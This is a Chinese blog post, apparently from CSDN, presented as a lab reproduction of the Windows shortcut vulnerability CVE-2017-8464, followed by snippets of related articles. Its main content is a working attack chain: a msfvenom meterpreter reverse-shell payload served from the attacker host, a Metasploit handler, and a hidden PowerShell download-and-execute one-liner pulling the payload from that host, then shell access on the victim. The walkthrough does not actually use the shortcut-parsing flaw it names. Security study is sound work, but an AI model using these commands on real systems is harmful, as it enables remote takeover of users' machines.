CVE-2017-8464远程命令执行漏洞复现

最新推荐文章于 2024-08-09 19:37:26 发布
最新推荐文章于 2024-08-09 19:37:26 发布
阅读量1.4k 收藏 5
点赞数
分类专栏: CVE msf 系统漏洞复现 文章标签: 安全 linux windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WFC1006848997/article/details/112548131
版权
CVE 同时被 3 个专栏收录
5 篇文章 0 订阅
订阅专栏
系统漏洞复现
5 篇文章 1 订阅
订阅专栏
msf
2 篇文章 0 订阅
订阅专栏

CVE-2017-8464远程命令执行漏洞复现

漏洞描述

2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危

Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权限。

于是攻击者利用这一解析过程的漏洞,将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程中),受害者使用powershell解析 .LNK 文件后就会被黑客所控制。

成功利用此漏洞的攻击者可能会获得与本地用户相同的用户权限。

影响版本

windows 7
windows 8
windows 8.1
windows 10
windows server 2008
windows server 2008 R2
windows server 2012
windows server 2012 R2
windows server 2016

环境准备

攻击机:kali IP:192.168.30.154

靶机:Windows 7 X64 IP:192.168.30.153

漏洞复现

使用 kali msfvenom 生成一个反弹shell

root@kali911:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.30.154   LPORT=5656 -f psh-reflection>/var/www/html/hack.ps1

这里生成至 /var/www/html 目录下

在这里插入图片描述

启动 Apache 服务

root@kali911:~# service apache2 restart 
root@kali911:~# service apache2 status

在这里插入图片描述

浏览器打开该文件,查看是否成功

http://127.0.0.1/hack.ps1

在这里插入图片描述

启动 msf

root@kali911:~# msfconsole

使用监听模块multi/handler

msf5 > use exploit/multi/handler

指定 kali 攻击机 IP

msf5 exploit(multi/handler) > set LHOST 192.168.30.154

设置端口

msf5 exploit(multi/handler) > set LPORT 5656

设置返回载荷

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

靶机创建快捷键(桌面右键->新建->快捷方式),输入以下内容

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.30.154/hack.ps1');test.ps1"

在这里插入图片描述

完成创建,运行快捷方式,一闪而过

回到 kali ,开始攻击

msf5 exploit(multi/handler) > exploit

在这里插入图片描述

成功exp,查看系统信息

meterpreter > sysinfo

在这里插入图片描述

还可进行更多操作这里就不一一介绍了

登录 shell

meterpreter > shell

在这里插入图片描述

查看当前用户

C:\Windows\System32\WindowsPowerShell\v1.0>whoami

在这里插入图片描述

Spaceman-911
关注
专栏目录
利用CVE-2017-8464漏洞制作病毒U盘攻击
RockHan
01-09 2722
利用CVE-2017-8464漏洞制作病毒U盘 漏洞简介 在“震网行动”中攻击者利用LNK快捷方式漏洞成功入侵了工控系统,并进一步利用漏洞做摆渡攻击,入侵核心工控系统,LNK漏洞危害级别为高危,用户只要是浏览或查看了存 在病毒的LNK文件,不需要用户点击,就会执行入侵者构造好的恶意代码。 病毒U盘制作 使用kali中msfconsole攻击模块生成病毒U盘文件。 1、启动msfconso...
CVE-2017-8464 分析
weixin_30814319的博客
12-28 872
目录 CVE-2017-8464(stuxnet 3.0) 分析 0xFF 前言 0x00 分析工具 0x01 漏洞复现 1)、生成一个DLL用于测试 2)、构造一个恶意的lnk二进制文件 3)、RUA! ...
CVE-2017-8464 “震网三代“ 漏洞复现
最新发布
cxm4545的博客
08-09 382
2017年6月13日,微软官方发布编号CVE-2017-8464漏洞公告官方介绍Windows系统解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统。传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。被攻击机插入存在攻击lnk的U盘后会反弹shell,哪怕是被隔离的内网,也可以在不上网的情况下被攻击。
CVE-2017-8464 转载poc
如鹿渴慕泉水的专栏
08-08 1498
#!/usr/bin/python # -*- coding: utf-8 -*- # Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability # CVE : 2017-8464 # Authors : [ykoster, nixawk] # Notic
CVE-2017-8464远程命令执行漏洞(震网漏洞复现
kuiguowei的博客
01-16 1892
2017年6月13日,微软官方发布编号CVE-2017-8464漏洞公告官方介绍Windows系统解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统安全风险高危。 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何
kali下CVE-2017-8464利用
我的学习笔记
02-28 550
参考:https://www.exploit-db.com/exploits/42382https://www.youtube.com/watch?v=nKZTUnjt2VsMicrosoft LNK RCE Exploit下载42382.rb文件 mv 42382.rb CVE_2017_8464_LINK_Rce.rb mv CVE_2017_84...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
CVE-2017-12615 Tomcat远程命令执行漏洞
mirocky的博客
10-13 654
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行
MSF之CVE-2017-8464远程命令执行漏洞复现
极光时流
12-02 3291
MSF之CVE-2017-8464远程命令执行漏洞复现准备扫描漏洞 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107 攻击机:虚拟机kali系统,其IP为:192.168.1.111 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole cd 下载/ msfvenom -p windows...
CVE-2017-8464震网3.0漏洞分析与复现
weixin_45484297的博客
03-29 2219
概述:微软2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该漏洞的PoC。官方介绍Windows系统解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统安全风险高危。本次实验主要分为漏洞复现和poc原理分析两部分,通过实验理清该漏洞可能的的攻击途径以及如何防护。 1.漏洞介绍漏洞的原理同2010年美国和以色列入
CVE-2017-8464漏洞原理分析
RockHan
01-08 3584
CVE-2017-8464漏洞原理分析 CVE-2017-8464漏洞诞生 CVE-2017-8464 漏洞是MS15-020(CVE-2015-0096)的变体,可绕过MS10-046(CVE-2010-2568)和 MS15-020(CVE-2015-0096)。 CVE-2017-8464漏洞原理 Windows系统使用二进制解析 .LNK文件,当恶意二进...
CVE-2017-8464 震网三代复现U盘利用
weixin_52777165的博客
01-16 576
一.影响版本 漏洞影响范围: Windows 7 Windows 8.1 Windows RT 8.1 Windows 10 服务器系统Windows Server 2008 Windows Server 2008 R2 Windows Server 2012 Windows Server 2012 R2 Windows Server 2016 二.漏洞复现 攻击机:kali2019.4 IP:192.168.1.12 靶机:win10 IP:192.168.1.3 打开kali终端进入msfcon
CVE-2017-8464(震网三代)复现
andiao1218的博客
11-05 483
开启msf root@sch01ar:~# msfconsole 设置模块 msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce 设置payload msf exploit(cve_2017_8464_lnk_rce) > set payload windows/x64/...
【研究】震网三代漏洞
weixin_30414155的博客
08-29 268
一、 CVE-2017-8464远程命令执行漏洞(震网三代漏洞复现 漏洞描述: 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限。 注释:...
震网三代(CVE-2017-8464
m0_57379855的博客
03-31 2366
震网三代(CVE-2017-8464CVE-2017-8464环境准备利用原理漏洞利用后渗透 CVE-2017-8464 说明: 2017年6月13日,微软官方发布编号CVE-2017-8464漏洞公告官方介绍Windows系统解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统安全风险高危 传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 危害: 被攻击机插入存在攻击lnk的U盘后会反弹shell,
CVE-2017-8464复现(震网三代)
小赵同学的博客
01-17 443
CVE-2017-8464复现(震网三代) 影响版本 windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008 1. 漏洞利用与复现 环境: 攻击机kali:192.168.228.128 靶机window10 192.168.228.129 Kali终端输入
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值